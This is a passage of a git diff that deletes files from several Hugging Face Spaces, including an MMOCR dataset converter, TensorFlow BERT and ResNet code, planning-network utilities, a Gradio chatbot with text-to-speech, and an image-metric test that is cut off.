a/spaces/Mountchicken/MAERec-Gradio/tools/dataset_converters/textrecog/naf_converter.py b/spaces/Mountchicken/MAERec-Gradio/tools/dataset_converters/textrecog/naf_converter.py deleted file mode 100644 index 3c6d84ad2d9613606e767bdd67793f65ae0e5239..0000000000000000000000000000000000000000 --- a/spaces/Mountchicken/MAERec-Gradio/tools/dataset_converters/textrecog/naf_converter.py +++ /dev/null @@ -1,272 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import argparse -import os.path as osp - -import mmcv -import mmengine -import numpy as np - -from mmocr.utils import crop_img, dump_ocr_data - - -def collect_files(img_dir, gt_dir, split_info): - """Collect all images and their corresponding groundtruth files. - - Args: - img_dir (str): The image directory - gt_dir (str): The groundtruth directory - split_info (dict): The split information for train/val/test - - Returns: - files (list): The list of tuples (img_file, groundtruth_file) - """ - assert isinstance(img_dir, str) - assert img_dir - assert isinstance(gt_dir, str) - assert gt_dir - assert isinstance(split_info, dict) - assert split_info - - ann_list, imgs_list = [], [] - for group in split_info: - for img in split_info[group]: - image_path = osp.join(img_dir, img) - anno_path = osp.join(gt_dir, 'groups', group, - img.replace('jpg', 'json')) - - # Filtering out the missing images - if not osp.exists(image_path) or not osp.exists(anno_path): - continue - - imgs_list.append(image_path) - ann_list.append(anno_path) - - files = list(zip(imgs_list, ann_list)) - assert len(files), f'No images found in {img_dir}' - print(f'Loaded {len(files)} images from {img_dir}') - - return files - - -def collect_annotations(files, nproc=1): - """Collect the annotation information. - - Args: - files (list): The list of tuples (image_file, groundtruth_file) - nproc (int): The number of process to collect annotations - - Returns: - images (list): The list of image information dicts - """ - assert isinstance(files, list) - assert isinstance(nproc, int) - - if nproc > 1: - images = mmengine.track_parallel_progress( - load_img_info, files, nproc=nproc) - else: - images = mmengine.track_progress(load_img_info, files) - - return images - - -def load_img_info(files): - """Load the information of one image. - - Args: - files (tuple): The tuple of (img_file, groundtruth_file) - - Returns: - img_info (dict): The dict of the img and annotation information - """ - assert isinstance(files, tuple) - - img_file, gt_file = files - assert osp.basename(gt_file).split('.')[0] == osp.basename(img_file).split( - '.')[0] - # Read imgs while ignoring orientations - img = mmcv.imread(img_file, 'unchanged') - - img_info = dict( - file_name=osp.join(osp.basename(img_file)), - height=img.shape[0], - width=img.shape[1], - segm_file=osp.join(osp.basename(gt_file))) - - if osp.splitext(gt_file)[1] == '.json': - img_info = load_json_info(gt_file, img_info) - else: - raise NotImplementedError - - return img_info - - -def load_json_info(gt_file, img_info): - """Collect the annotation information. - - Annotation Format - { - 'filedBBs': [{ - 'poly_points': [[435,1406], [466,1406], [466,1439], [435,1439]], - "type": "fieldCheckBox", - "id": "f0", - "isBlank": 1, # 0:text,1:handwriting,2:print,3:blank,4:signature, - }], ... - "transcriptions":{ - "f38": "CASE NUMBER", - "f29": "July 1, 1949", - "t20": "RANK", - "t19": "COMPANY", - ... - } - } - - Some special characters are used in the transcription: - "«text»" indicates that "text" had a strikethrough - "¿" indicates the transcriber could not read a character - "§" indicates the whole line or word was illegible - "" (empty string) is if the field was blank - - Args: - gt_file (str): The path to ground-truth - img_info (dict): The dict of the img and annotation information - - Returns: - img_info (dict): The dict of the img and annotation information - """ - assert isinstance(gt_file, str) - assert isinstance(img_info, dict) - - annotation = mmengine.load(gt_file) - anno_info = [] - - # 'textBBs' contains the printed texts of the table while 'fieldBBs' - # contains the text filled by human. - for box_type in ['textBBs', 'fieldBBs']: - # NAF dataset only provides transcription GT for 'filedBBs', the - # 'textBBs' is only used for detection task. - if box_type == 'textBBs': - continue - for anno in annotation[box_type]: - # Skip images containing detection annotations only - if 'transcriptions' not in annotation.keys(): - continue - # Skip boxes without recognition GT - if anno['id'] not in annotation['transcriptions'].keys(): - continue - - word = annotation['transcriptions'][anno['id']] - # Skip blank boxes - if len(word) == 0: - continue - - bbox = np.array(anno['poly_points']).reshape(1, 8)[0].tolist() - - anno = dict(bbox=bbox, word=word) - anno_info.append(anno) - - img_info.update(anno_info=anno_info) - - return img_info - - -def generate_ann(root_path, split, image_infos, preserve_vertical): - """Generate cropped annotations and label txt file. - - Args: - root_path (str): The root path of the dataset - split (str): The split of dataset. Namely: training or test - image_infos (list[dict]): A list of dicts of the img and - annotation information - preserve_vertical (bool): Whether to preserve vertical texts - """ - - dst_image_root = osp.join(root_path, 'crops', split) - ignore_image_root = osp.join(root_path, 'ignores', split) - if split == 'training': - dst_label_file = osp.join(root_path, 'train_label.json') - elif split == 'val': - dst_label_file = osp.join(root_path, 'val_label.json') - elif split == 'test': - dst_label_file = osp.join(root_path, 'test_label.json') - else: - raise NotImplementedError - mmengine.mkdir_or_exist(dst_image_root) - mmengine.mkdir_or_exist(ignore_image_root) - - img_info = [] - for image_info in image_infos: - index = 1 - src_img_path = osp.join(root_path, 'imgs', image_info['file_name']) - image = mmcv.imread(src_img_path) - src_img_root = image_info['file_name'].split('.')[0] - - for anno in image_info['anno_info']: - word = anno['word'] - word = word.strip('\u202a') # Remove unicode control character - word = word.replace('»', - '').replace('«', - '') # Remove strikethrough flag - dst_img = crop_img(image, anno['bbox'], 0, 0) - h, w, _ = dst_img.shape - - dst_img_name = f'{src_img_root}_{index}.png' - index += 1 - # Skip invalid and illegible annotations - if min(dst_img.shape) == 0 or '§' in word or '¿' in word or len( - word) == 0: - continue - # Skip vertical texts - # (Do Not Filter For Val and Test Split) - if (not preserve_vertical and h / w > 2) and split == 'training': - dst_img_path = osp.join(ignore_image_root, dst_img_name) - mmcv.imwrite(dst_img, dst_img_path) - continue - - dst_img_path = osp.join(dst_image_root, dst_img_name) - mmcv.imwrite(dst_img, dst_img_path) - - img_info.append({ - 'file_name': dst_img_name, - 'anno_info': [{ - 'text': word - }] - }) - - dump_ocr_data(img_info, dst_label_file, 'textrecog') - - -def parse_args(): - parser = argparse.ArgumentParser( - description='Generate training, val, and test set of NAF ') - parser.add_argument('root_path', help='Root dir path of NAF') - parser.add_argument( - '--preserve-vertical', - help='Preserve samples containing vertical texts', - action='store_true') - parser.add_argument( - '--nproc', default=1, type=int, help='Number of process') - args = parser.parse_args() - return args - - -def main(): - args = parse_args() - root_path = args.root_path - split_info = mmengine.load( - osp.join(root_path, 'annotations', 'train_valid_test_split.json')) - split_info['training'] = split_info.pop('train') - split_info['val'] = split_info.pop('valid') - for split in ['training', 'val', 'test']: - print(f'Processing {split} set...') - with mmengine.Timer( - print_tmpl='It takes {}s to convert NAF annotation'): - files = collect_files( - osp.join(root_path, 'imgs'), - osp.join(root_path, 'annotations'), split_info[split]) - image_infos = collect_annotations(files, nproc=args.nproc) - generate_ann(root_path, split, image_infos, args.preserve_vertical) - - -if __name__ == '__main__': - main() diff --git a/spaces/MrSashkaman/StyleTransfer/README.md b/spaces/MrSashkaman/StyleTransfer/README.md deleted file mode 100644 index 7173629ca20a074cfdf7c81b5b825f7254ba5f75..0000000000000000000000000000000000000000 --- a/spaces/MrSashkaman/StyleTransfer/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: StyleTransfer -emoji: 🐠 -colorFrom: red -colorTo: gray -sdk: docker -app_port: 7860 -pinned: false -license: openrail ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/NCTCMumbai/NCTC/models/official/nlp/bert/export_tfhub_test.py b/spaces/NCTCMumbai/NCTC/models/official/nlp/bert/export_tfhub_test.py deleted file mode 100644 index 6b6fd40f5e1be5d5e8d4699d54c048add7435523..0000000000000000000000000000000000000000 --- a/spaces/NCTCMumbai/NCTC/models/official/nlp/bert/export_tfhub_test.py +++ /dev/null @@ -1,109 +0,0 @@ -# Copyright 2019 The TensorFlow Authors. All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# ============================================================================== -"""Tests official.nlp.bert.export_tfhub.""" - -from __future__ import absolute_import -from __future__ import division -from __future__ import print_function - -import os - -import numpy as np - -import tensorflow as tf -import tensorflow_hub as hub -from official.nlp.bert import configs -from official.nlp.bert import export_tfhub - - -class ExportTfhubTest(tf.test.TestCase): - - def test_export_tfhub(self): - # Exports a savedmodel for TF-Hub - hidden_size = 16 - bert_config = configs.BertConfig( - vocab_size=100, - hidden_size=hidden_size, - intermediate_size=32, - max_position_embeddings=128, - num_attention_heads=2, - num_hidden_layers=1) - bert_model, encoder = export_tfhub.create_bert_model(bert_config) - model_checkpoint_dir = os.path.join(self.get_temp_dir(), "checkpoint") - checkpoint = tf.train.Checkpoint(model=encoder) - checkpoint.save(os.path.join(model_checkpoint_dir, "test")) - model_checkpoint_path = tf.train.latest_checkpoint(model_checkpoint_dir) - - vocab_file = os.path.join(self.get_temp_dir(), "uncased_vocab.txt") - with tf.io.gfile.GFile(vocab_file, "w") as f: - f.write("dummy content") - - hub_destination = os.path.join(self.get_temp_dir(), "hub") - export_tfhub.export_bert_tfhub(bert_config, model_checkpoint_path, - hub_destination, vocab_file) - - # Restores a hub KerasLayer. - hub_layer = hub.KerasLayer(hub_destination, trainable=True) - - if hasattr(hub_layer, "resolved_object"): - # Checks meta attributes. - self.assertTrue(hub_layer.resolved_object.do_lower_case.numpy()) - with tf.io.gfile.GFile( - hub_layer.resolved_object.vocab_file.asset_path.numpy()) as f: - self.assertEqual("dummy content", f.read()) - # Checks the hub KerasLayer. - for source_weight, hub_weight in zip(bert_model.trainable_weights, - hub_layer.trainable_weights): - self.assertAllClose(source_weight.numpy(), hub_weight.numpy()) - - seq_length = 10 - dummy_ids = np.zeros((2, seq_length), dtype=np.int32) - hub_outputs = hub_layer([dummy_ids, dummy_ids, dummy_ids]) - source_outputs = bert_model([dummy_ids, dummy_ids, dummy_ids]) - - # The outputs of hub module are "pooled_output" and "sequence_output", - # while the outputs of encoder is in reversed order, i.e., - # "sequence_output" and "pooled_output". - encoder_outputs = reversed(encoder([dummy_ids, dummy_ids, dummy_ids])) - self.assertEqual(hub_outputs[0].shape, (2, hidden_size)) - self.assertEqual(hub_outputs[1].shape, (2, seq_length, hidden_size)) - for source_output, hub_output, encoder_output in zip( - source_outputs, hub_outputs, encoder_outputs): - self.assertAllClose(source_output.numpy(), hub_output.numpy()) - self.assertAllClose(source_output.numpy(), encoder_output.numpy()) - - # Test that training=True makes a difference (activates dropout). - def _dropout_mean_stddev(training, num_runs=20): - input_ids = np.array([[14, 12, 42, 95, 99]], np.int32) - inputs = [input_ids, np.ones_like(input_ids), np.zeros_like(input_ids)] - outputs = np.concatenate( - [hub_layer(inputs, training=training)[0] for _ in range(num_runs)]) - return np.mean(np.std(outputs, axis=0)) - self.assertLess(_dropout_mean_stddev(training=False), 1e-6) - self.assertGreater(_dropout_mean_stddev(training=True), 1e-3) - - # Test propagation of seq_length in shape inference. - input_word_ids = tf.keras.layers.Input(shape=(seq_length,), dtype=tf.int32) - input_mask = tf.keras.layers.Input(shape=(seq_length,), dtype=tf.int32) - input_type_ids = tf.keras.layers.Input(shape=(seq_length,), dtype=tf.int32) - pooled_output, sequence_output = hub_layer( - [input_word_ids, input_mask, input_type_ids]) - self.assertEqual(pooled_output.shape.as_list(), [None, hidden_size]) - self.assertEqual(sequence_output.shape.as_list(), - [None, seq_length, hidden_size]) - - -if __name__ == "__main__": - tf.test.main() diff --git a/spaces/NCTCMumbai/NCTC/models/official/vision/image_classification/resnet/resnet_ctl_imagenet_main.py b/spaces/NCTCMumbai/NCTC/models/official/vision/image_classification/resnet/resnet_ctl_imagenet_main.py deleted file mode 100644 index c128dc0b99535d806634b42b99a2e56211c567ca..0000000000000000000000000000000000000000 --- a/spaces/NCTCMumbai/NCTC/models/official/vision/image_classification/resnet/resnet_ctl_imagenet_main.py +++ /dev/null @@ -1,196 +0,0 @@ -# Copyright 2019 The TensorFlow Authors. All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# ============================================================================== -"""Runs a ResNet model on the ImageNet dataset using custom training loops.""" - -from __future__ import absolute_import -from __future__ import division -from __future__ import print_function - -import math -from absl import app -from absl import flags -from absl import logging -import tensorflow as tf - -from official.modeling import performance -from official.staging.training import controller -from official.utils.flags import core as flags_core -from official.utils.misc import distribution_utils -from official.utils.misc import keras_utils -from official.utils.misc import model_helpers -from official.vision.image_classification.resnet import common -from official.vision.image_classification.resnet import imagenet_preprocessing -from official.vision.image_classification.resnet import resnet_runnable - -flags.DEFINE_boolean(name='use_tf_function', default=True, - help='Wrap the train and test step inside a ' - 'tf.function.') -flags.DEFINE_boolean(name='single_l2_loss_op', default=False, - help='Calculate L2_loss on concatenated weights, ' - 'instead of using Keras per-layer L2 loss.') - - -def build_stats(runnable, time_callback): - """Normalizes and returns dictionary of stats. - - Args: - runnable: The module containing all the training and evaluation metrics. - time_callback: Time tracking callback instance. - - Returns: - Dictionary of normalized results. - """ - stats = {} - - if not runnable.flags_obj.skip_eval: - stats['eval_loss'] = runnable.test_loss.result().numpy() - stats['eval_acc'] = runnable.test_accuracy.result().numpy() - - stats['train_loss'] = runnable.train_loss.result().numpy() - stats['train_acc'] = runnable.train_accuracy.result().numpy() - - if time_callback: - timestamp_log = time_callback.timestamp_log - stats['step_timestamp_log'] = timestamp_log - stats['train_finish_time'] = time_callback.train_finish_time - if time_callback.epoch_runtime_log: - stats['avg_exp_per_second'] = time_callback.average_examples_per_second - - return stats - - -def get_num_train_iterations(flags_obj): - """Returns the number of training steps, train and test epochs.""" - train_steps = ( - imagenet_preprocessing.NUM_IMAGES['train'] // flags_obj.batch_size) - train_epochs = flags_obj.train_epochs - - if flags_obj.train_steps: - train_steps = min(flags_obj.train_steps, train_steps) - train_epochs = 1 - - eval_steps = math.ceil(1.0 * imagenet_preprocessing.NUM_IMAGES['validation'] / - flags_obj.batch_size) - - return train_steps, train_epochs, eval_steps - - -def _steps_to_run(steps_in_current_epoch, steps_per_epoch, steps_per_loop): - """Calculates steps to run on device.""" - if steps_per_loop <= 0: - raise ValueError('steps_per_loop should be positive integer.') - if steps_per_loop == 1: - return steps_per_loop - return min(steps_per_loop, steps_per_epoch - steps_in_current_epoch) - - -def run(flags_obj): - """Run ResNet ImageNet training and eval loop using custom training loops. - - Args: - flags_obj: An object containing parsed flag values. - - Raises: - ValueError: If fp16 is passed as it is not currently supported. - - Returns: - Dictionary of training and eval stats. - """ - keras_utils.set_session_config( - enable_xla=flags_obj.enable_xla) - performance.set_mixed_precision_policy(flags_core.get_tf_dtype(flags_obj)) - - if tf.config.list_physical_devices('GPU'): - if flags_obj.tf_gpu_thread_mode: - keras_utils.set_gpu_thread_mode_and_count( - per_gpu_thread_count=flags_obj.per_gpu_thread_count, - gpu_thread_mode=flags_obj.tf_gpu_thread_mode, - num_gpus=flags_obj.num_gpus, - datasets_num_private_threads=flags_obj.datasets_num_private_threads) - common.set_cudnn_batchnorm_mode() - - # TODO(anj-s): Set data_format without using Keras. - data_format = flags_obj.data_format - if data_format is None: - data_format = ('channels_first' if tf.config.list_physical_devices('GPU') - else 'channels_last') - tf.keras.backend.set_image_data_format(data_format) - - strategy = distribution_utils.get_distribution_strategy( - distribution_strategy=flags_obj.distribution_strategy, - num_gpus=flags_obj.num_gpus, - all_reduce_alg=flags_obj.all_reduce_alg, - num_packs=flags_obj.num_packs, - tpu_address=flags_obj.tpu) - - per_epoch_steps, train_epochs, eval_steps = get_num_train_iterations( - flags_obj) - steps_per_loop = min(flags_obj.steps_per_loop, per_epoch_steps) - - logging.info( - 'Training %d epochs, each epoch has %d steps, ' - 'total steps: %d; Eval %d steps', train_epochs, per_epoch_steps, - train_epochs * per_epoch_steps, eval_steps) - - time_callback = keras_utils.TimeHistory( - flags_obj.batch_size, - flags_obj.log_steps, - logdir=flags_obj.model_dir if flags_obj.enable_tensorboard else None) - with distribution_utils.get_strategy_scope(strategy): - runnable = resnet_runnable.ResnetRunnable(flags_obj, time_callback, - per_epoch_steps) - - eval_interval = flags_obj.epochs_between_evals * per_epoch_steps - checkpoint_interval = ( - per_epoch_steps if flags_obj.enable_checkpoint_and_export else None) - summary_interval = per_epoch_steps if flags_obj.enable_tensorboard else None - - checkpoint_manager = tf.train.CheckpointManager( - runnable.checkpoint, - directory=flags_obj.model_dir, - max_to_keep=10, - step_counter=runnable.global_step, - checkpoint_interval=checkpoint_interval) - - resnet_controller = controller.Controller( - strategy, - runnable.train, - runnable.evaluate if not flags_obj.skip_eval else None, - global_step=runnable.global_step, - steps_per_loop=steps_per_loop, - train_steps=per_epoch_steps * train_epochs, - checkpoint_manager=checkpoint_manager, - summary_interval=summary_interval, - eval_steps=eval_steps, - eval_interval=eval_interval) - - time_callback.on_train_begin() - resnet_controller.train(evaluate=not flags_obj.skip_eval) - time_callback.on_train_end() - - stats = build_stats(runnable, time_callback) - return stats - - -def main(_): - model_helpers.apply_clean(flags.FLAGS) - stats = run(flags.FLAGS) - logging.info('Run stats:\n%s', stats) - - -if __name__ == '__main__': - logging.set_verbosity(logging.INFO) - common.define_keras_flags() - app.run(main) diff --git a/spaces/NCTCMumbai/NCTC/models/research/cognitive_mapping_and_planning/tfcode/cmp_utils.py b/spaces/NCTCMumbai/NCTC/models/research/cognitive_mapping_and_planning/tfcode/cmp_utils.py deleted file mode 100644 index 6d87c697b4b29128c8b8a42caac27aeb4d657ec6..0000000000000000000000000000000000000000 --- a/spaces/NCTCMumbai/NCTC/models/research/cognitive_mapping_and_planning/tfcode/cmp_utils.py +++ /dev/null @@ -1,164 +0,0 @@ -# Copyright 2016 The TensorFlow Authors All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# ============================================================================== - -"""Utility functions for setting up the CMP graph. -""" - -import os, numpy as np -import matplotlib.pyplot as plt - - -import tensorflow as tf - -from tensorflow.contrib import slim -from tensorflow.contrib.slim import arg_scope -import logging -from src import utils -import src.file_utils as fu -from tfcode import tf_utils - -resnet_v2 = tf_utils.resnet_v2 -custom_residual_block = tf_utils.custom_residual_block - -def value_iteration_network( - fr, num_iters, val_neurons, action_neurons, kernel_size, share_wts=False, - name='vin', wt_decay=0.0001, activation_fn=None, shape_aware=False): - """ - Constructs a Value Iteration Network, convolutions and max pooling across - channels. - Input: - fr: NxWxHxC - val_neurons: Number of channels for maintaining the value. - action_neurons: Computes action_neurons * val_neurons at each iteration to - max pool over. - Output: - value image: NxHxWx(val_neurons) - """ - init_var = np.sqrt(2.0/(kernel_size**2)/(val_neurons*action_neurons)) - vals = [] - with tf.variable_scope(name) as varscope: - if shape_aware == False: - fr_shape = tf.unstack(tf.shape(fr)) - val_shape = tf.stack(fr_shape[:-1] + [val_neurons]) - val = tf.zeros(val_shape, name='val_init') - else: - val = tf.expand_dims(tf.zeros_like(fr[:,:,:,0]), dim=-1) * \ - tf.constant(0., dtype=tf.float32, shape=[1,1,1,val_neurons]) - val_shape = tf.shape(val) - vals.append(val) - for i in range(num_iters): - if share_wts: - # The first Value Iteration maybe special, so it can have its own - # paramterss. - scope = 'conv' - if i == 0: scope = 'conv_0' - if i > 1: varscope.reuse_variables() - else: - scope = 'conv_{:d}'.format(i) - val = slim.conv2d(tf.concat([val, fr], 3, name='concat_{:d}'.format(i)), - num_outputs=action_neurons*val_neurons, - kernel_size=kernel_size, stride=1, activation_fn=activation_fn, - scope=scope, normalizer_fn=None, - weights_regularizer=slim.l2_regularizer(wt_decay), - weights_initializer=tf.random_normal_initializer(stddev=init_var), - biases_initializer=tf.zeros_initializer()) - val = tf.reshape(val, [-1, action_neurons*val_neurons, 1, 1], - name='re_{:d}'.format(i)) - val = slim.max_pool2d(val, kernel_size=[action_neurons,1], - stride=[action_neurons,1], padding='VALID', - scope='val_{:d}'.format(i)) - val = tf.reshape(val, val_shape, name='unre_{:d}'.format(i)) - vals.append(val) - return val, vals - - -def rotate_preds(loc_on_map, relative_theta, map_size, preds, - output_valid_mask): - with tf.name_scope('rotate'): - flow_op = tf_utils.get_flow(loc_on_map, relative_theta, map_size=map_size) - if type(preds) != list: - rotated_preds, valid_mask_warps = tf_utils.dense_resample(preds, flow_op, - output_valid_mask) - else: - rotated_preds = [] ;valid_mask_warps = [] - for pred in preds: - rotated_pred, valid_mask_warp = tf_utils.dense_resample(pred, flow_op, - output_valid_mask) - rotated_preds.append(rotated_pred) - valid_mask_warps.append(valid_mask_warp) - return rotated_preds, valid_mask_warps - -def get_visual_frustum(map_size, shape_like, expand_dims=[0,0]): - with tf.name_scope('visual_frustum'): - l = np.tril(np.ones(map_size)) ;l = l + l[:,::-1] - l = (l == 2).astype(np.float32) - for e in expand_dims: - l = np.expand_dims(l, axis=e) - confs_probs = tf.constant(l, dtype=tf.float32) - confs_probs = tf.ones_like(shape_like, dtype=tf.float32) * confs_probs - return confs_probs - -def deconv(x, is_training, wt_decay, neurons, strides, layers_per_block, - kernel_size, conv_fn, name, offset=0): - """Generates a up sampling network with residual connections. - """ - batch_norm_param = {'center': True, 'scale': True, - 'activation_fn': tf.nn.relu, - 'is_training': is_training} - outs = [] - for i, (neuron, stride) in enumerate(zip(neurons, strides)): - for s in range(layers_per_block): - scope = '{:s}_{:d}_{:d}'.format(name, i+1+offset,s+1) - x = custom_residual_block(x, neuron, kernel_size, stride, scope, - is_training, wt_decay, use_residual=True, - residual_stride_conv=True, conv_fn=conv_fn, - batch_norm_param=batch_norm_param) - stride = 1 - outs.append((x,True)) - return x, outs - -def fr_v2(x, output_neurons, inside_neurons, is_training, name='fr', - wt_decay=0.0001, stride=1, updates_collections=tf.GraphKeys.UPDATE_OPS): - """Performs fusion of information between the map and the reward map. - Inputs - x: NxHxWxC1 - - Outputs - fr map: NxHxWx(output_neurons) - """ - if type(stride) != list: - stride = [stride] - with slim.arg_scope(resnet_v2.resnet_utils.resnet_arg_scope( - is_training=is_training, weight_decay=wt_decay)): - with slim.arg_scope([slim.batch_norm], updates_collections=updates_collections) as arg_sc: - # Change the updates_collections for the conv normalizer_params to None - for i in range(len(arg_sc.keys())): - if 'convolution' in arg_sc.keys()[i]: - arg_sc.values()[i]['normalizer_params']['updates_collections'] = updates_collections - with slim.arg_scope(arg_sc): - bottleneck = resnet_v2.bottleneck - blocks = [] - for i, s in enumerate(stride): - b = resnet_v2.resnet_utils.Block( - 'block{:d}'.format(i + 1), bottleneck, [{ - 'depth': output_neurons, - 'depth_bottleneck': inside_neurons, - 'stride': stride[i] - }]) - blocks.append(b) - x, outs = resnet_v2.resnet_v2(x, blocks, num_classes=None, global_pool=False, - output_stride=None, include_root_block=False, - reuse=False, scope=name) - return x, outs diff --git a/spaces/Naveen618/mygenAIAvatharSpeech/app.py b/spaces/Naveen618/mygenAIAvatharSpeech/app.py deleted file mode 100644 index ca8b6d40b4ab898c70da92f4a4298de2baf703dc..0000000000000000000000000000000000000000 --- a/spaces/Naveen618/mygenAIAvatharSpeech/app.py +++ /dev/null @@ -1,164 +0,0 @@ -import os -import re -import requests -import json -import gradio as gr -from langchain.chat_models import ChatOpenAI -from langchain import LLMChain, PromptTemplate -from langchain.memory import ConversationBufferMemory - -OPENAI_API_KEY=os.getenv('OPENAI_API_KEY') -PLAY_HT_API_KEY=os.getenv('PLAY_HT_API_KEY') -PLAY_HT_USER_ID=os.getenv('PLAY_HT_USER_ID') - -PLAY_HT_VOICE_ID=os.getenv('PLAY_HT_VOICE_ID') -play_ht_api_get_audio_url = "https://play.ht/api/v2/tts" - - -template = """You are a helpful assistant to answer user queries. -{chat_history} -User: {user_message} -Chatbot:""" - -prompt = PromptTemplate( - input_variables=["chat_history", "user_message"], template=template -) - -memory = ConversationBufferMemory(memory_key="chat_history") - -llm_chain = LLMChain( - llm=ChatOpenAI(temperature='0.5', model_name="gpt-3.5-turbo"), - prompt=prompt, - verbose=True, - memory=memory, -) - -headers = { - "accept": "text/event-stream", - "content-type": "application/json", - "AUTHORIZATION": "Bearer "+ PLAY_HT_API_KEY, - "X-USER-ID": PLAY_HT_USER_ID -} - - -def get_payload(text): - return { - "text": text, - "voice": PLAY_HT_VOICE_ID, - "quality": "medium", - "output_format": "mp3", - "speed": 1, - "sample_rate": 24000, - "seed": None, - "temperature": None - } - -def get_generated_audio(text): - payload = get_payload(text) - generated_response = {} - try: - response = requests.post(play_ht_api_get_audio_url, json=payload, headers=headers) - response.raise_for_status() - generated_response["type"]= 'SUCCESS' - generated_response["response"] = response.text - except requests.exceptions.RequestException as e: - generated_response["type"]= 'ERROR' - try: - response_text = json.loads(response.text) - if response_text['error_message']: - generated_response["response"] = response_text['error_message'] - else: - generated_response["response"] = response.text - except Exception as e: - generated_response["response"] = response.text - except Exception as e: - generated_response["type"]= 'ERROR' - generated_response["response"] = response.text - return generated_response - -def extract_urls(text): - # Define the regex pattern for URLs - url_pattern = r'https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+[/\w\.-]*' - - # Find all occurrences of URLs in the text - urls = re.findall(url_pattern, text) - - return urls - -def get_audio_reply_for_question(text): - generated_audio_event = get_generated_audio(text) - #From get_generated_audio, you will get events in a string format, from that we need to extract the url - final_response = { - "audio_url": '', - "message": '' - } - if generated_audio_event["type"] == 'SUCCESS': - audio_urls = extract_urls(generated_audio_event["response"]) - if len(audio_urls) == 0: - final_response['message'] = "No audio file link found in generated event" - else: - final_response['audio_url'] = audio_urls[-1] - else: - final_response['message'] = generated_audio_event['response'] - return final_response - -def download_url(url): - try: - # Send a GET request to the URL to fetch the content - final_response = { - 'content':'', - 'error':'' - } - response = requests.get(url) - # Check if the request was successful (status code 200) - if response.status_code == 200: - final_response['content'] = response.content - else: - final_response['error'] = f"Failed to download the URL. Status code: {response.status_code}" - except Exception as e: - final_response['error'] = f"Failed to download the URL. Error: {e}" - return final_response - -def get_filename_from_url(url): - # Use os.path.basename() to extract the file name from the URL - file_name = os.path.basename(url) - return file_name - -def get_text_response(user_message): - response = llm_chain.predict(user_message = user_message) - return response - -def get_text_response_and_audio_response(user_message): - response = get_text_response(user_message) # Getting the reply from Open AI - audio_reply_for_question_response = get_audio_reply_for_question(response) - final_response = { - 'output_file_path': '', - 'message':'' - } - audio_url = audio_reply_for_question_response['audio_url'] - if audio_url: - output_file_path=get_filename_from_url(audio_url) - download_url_response = download_url(audio_url) - audio_content = download_url_response['content'] - if audio_content: - with open(output_file_path, "wb") as audio_file: - audio_file.write(audio_content) - final_response['output_file_path'] = output_file_path - else: - final_response['message'] = download_url_response['error'] - else: - final_response['message'] = audio_reply_for_question_response['message'] - return final_response - -def chat_bot_response(message, history): - text_and_audio_response = get_text_response_and_audio_response(message) - output_file_path = text_and_audio_response['output_file_path'] - if output_file_path: - return (text_and_audio_response['output_file_path'],) - else: - return text_and_audio_response['message'] - -demo = gr.ChatInterface(chat_bot_response,examples=["How are you doing?","What are your interests?","Which places do you like to visit?"]) - -if __name__ == "__main__": - demo.launch() #To create a public link, set `share=True` in `launch()`. To enable errors and logs, set `debug=True` in `launch()`. diff --git a/spaces/Nithila77/fashion-mnist/README.md b/spaces/Nithila77/fashion-mnist/README.md deleted file mode 100644 index 7ac637512df6a46fab7d5dfa1d98211228e614f7..0000000000000000000000000000000000000000 --- a/spaces/Nithila77/fashion-mnist/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Fashion Search -emoji: ⚡ -colorFrom: indigo -colorTo: blue -sdk: gradio -sdk_version: 3.11.0 -app_file: app.py -pinned: false -license: gpl-3.0 -duplicated_from: mattmdjaga/fashion_search ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Notmodern/andite-anything-v4.0/app.py b/spaces/Notmodern/andite-anything-v4.0/app.py deleted file mode 100644 index 47a2051db6dadeea03edf70d62694fd3e5e88ba7..0000000000000000000000000000000000000000 --- a/spaces/Notmodern/andite-anything-v4.0/app.py +++ /dev/null @@ -1,3 +0,0 @@ -import gradio as gr - -gr.Interface.load("models/andite/anything-v4.0").launch() \ No newline at end of file diff --git a/spaces/OAOA/DifFace/basicsr/metrics/test_metrics/test_psnr_ssim.py b/spaces/OAOA/DifFace/basicsr/metrics/test_metrics/test_psnr_ssim.py deleted file mode 100644 index 18b05a73a0e38e89b2321ddc9415123a92f5c5a4..0000000000000000000000000000000000000000 --- a/spaces/OAOA/DifFace/basicsr/metrics/test_metrics/test_psnr_ssim.py +++ /dev/null @@ -1,52 +0,0 @@ -import cv2 -import torch - -from basicsr.metrics import calculate_psnr, calculate_ssim -from basicsr.metrics.psnr_ssim import calculate_psnr_pt, calculate_ssim_pt -from basicsr.utils import img2tensor - - -def test(img_path, img_path2, crop_border, test_y_channel=False): - img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED) - img2 = cv2.imread(img_path2, cv2.IMREAD_UNCHANGED) - - # --------------------- Numpy --------------------- - psnr = calculate_psnr(img, img2, crop_border=crop_border, input_order='HWC', test_y_channel=test_y_channel) - ssim = calculate_ssim(img, img2, crop_border=crop_border, input_order='HWC', test_y_channel=test_y_channel) - 